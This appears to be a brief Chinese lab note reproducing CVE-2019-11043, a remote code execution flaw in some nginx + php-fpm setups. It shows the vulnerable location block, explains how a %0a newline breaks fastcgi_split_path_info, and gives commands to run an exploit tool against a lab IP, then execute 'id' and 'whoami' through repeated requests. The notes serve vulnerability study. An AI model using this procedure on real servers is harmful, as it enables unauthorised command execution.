CVE-2019-11043
特定配置的nginx+php-fpm的服务器会存在漏洞
如下配置:
location ~ [^/]\.php(/|$) {
...
fastcgi_split_path_info ^(.+?\.php)(/.*)$;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_pass php:9000;
...
}
可以使用换行符(%0a)来破坏fastcgi_split_path_info
指令中的Regexp, Regexp被损坏导致PATH_INFO为空,从而触发该漏洞
source /etc/profile
go run . “http://192.168.64.142:8080/index.php”
多次访问http://192.168.64.142:8080/index.php?a=id
因为php-fpm会启动多个子进程,在访问/index.php?a=id时需要多访问几次,以访问到被污染的进程
http://192.168.64.142:8080/index.php?a=whoami